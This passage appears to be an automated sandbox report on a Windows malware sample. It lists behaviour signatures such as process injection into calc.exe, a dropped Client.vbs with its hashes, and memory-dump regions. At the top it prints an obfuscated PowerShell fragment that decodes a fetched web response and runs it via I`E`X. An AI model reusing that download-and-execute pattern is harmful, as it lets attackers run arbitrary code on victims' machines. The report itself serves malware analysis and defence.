39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($76768858575776876868687575849493993845774)|I`E`X1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\calc.exe"{Path}"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Client.vbsMD5
d8be18018d7e360878a39f20e833442e
SHA163822d7145e6833e5a2c72d5a17f1ac13e7b53bd
SHA2567c6fcc75ebec15faf95018c7dc3681cdb615bdf9ecf0fcb49804ee4313c5291b
SHA51264ca50574ecfcfee3fe82cb6ca9199343676e383f391479f0f9d4978d54f882852032a3b573690dbc3f790f23f060bd64dc62510401c8990e52be168602bf8e5
-
memory/1384-87-0x0000000007B60000-0x0000000007CDD000-memory.dmpFilesize
1.5MB
-
memory/1384-82-0x0000000007040000-0x0000000007183000-memory.dmpFilesize
1.3MB
-
memory/1384-79-0x0000000006EE0000-0x0000000007032000-memory.dmpFilesize
1.3MB
-
memory/1656-64-0x0000000002622000-0x0000000002624000-memory.dmpFilesize
8KB
-
memory/1656-71-0x000000000264F000-0x0000000002650000-memory.dmpFilesize
4KB
-
memory/1656-63-0x0000000002620000-0x0000000002622000-memory.dmpFilesize
8KB
-
memory/1656-61-0x000007FEFB771000-0x000007FEFB773000-memory.dmpFilesize
8KB
-
memory/1656-65-0x0000000002624000-0x0000000002627000-memory.dmpFilesize
12KB
-
memory/1656-62-0x000007FEF2870000-0x000007FEF33CD000-memory.dmpFilesize
11.4MB
-
memory/1656-66-0x000000000262B000-0x000000000264A000-memory.dmpFilesize
124KB
-
memory/1656-70-0x000000000264E000-0x000000000264F000-memory.dmpFilesize
4KB
-
memory/1656-69-0x0000000002651000-0x0000000002652000-memory.dmpFilesize
4KB
-
memory/1656-68-0x0000000002652000-0x0000000002654000-memory.dmpFilesize
8KB
-
memory/1656-72-0x0000000002654000-0x0000000002655000-memory.dmpFilesize
4KB
-
memory/1720-56-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1720-88-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1720-55-0x000000006FD91000-0x000000006FD93000-memory.dmpFilesize
8KB
-
memory/1720-57-0x0000000075601000-0x0000000075603000-memory.dmpFilesize
8KB
-
memory/1720-54-0x0000000072311000-0x0000000072314000-memory.dmpFilesize
12KB
-
memory/1752-83-0x0000000000810000-0x0000000000818000-memory.dmpFilesize
32KB
-
memory/1752-86-0x0000000000270000-0x00000000006D1000-memory.dmpFilesize
4.4MB
-
memory/1752-85-0x0000000000820000-0x0000000000B23000-memory.dmpFilesize
3.0MB
-
memory/1752-84-0x00000000000C0000-0x00000000000EF000-memory.dmpFilesize
188KB
-
memory/1828-77-0x0000000000920000-0x0000000000C23000-memory.dmpFilesize
3.0MB
-
memory/1828-81-0x0000000000290000-0x000000000042F000-memory.dmpFilesize
1.6MB
-
memory/1828-78-0x0000000000240000-0x0000000000254000-memory.dmpFilesize
80KB
-
memory/1828-73-0x0000000000400000-0x000000000042F000-memory.dmpFilesize
188KB
-
memory/1828-75-0x0000000000400000-0x000000000042F000-memory.dmpFilesize
188KB
-
memory/1828-74-0x0000000000400000-0x000000000042F000-memory.dmpFilesize
188KB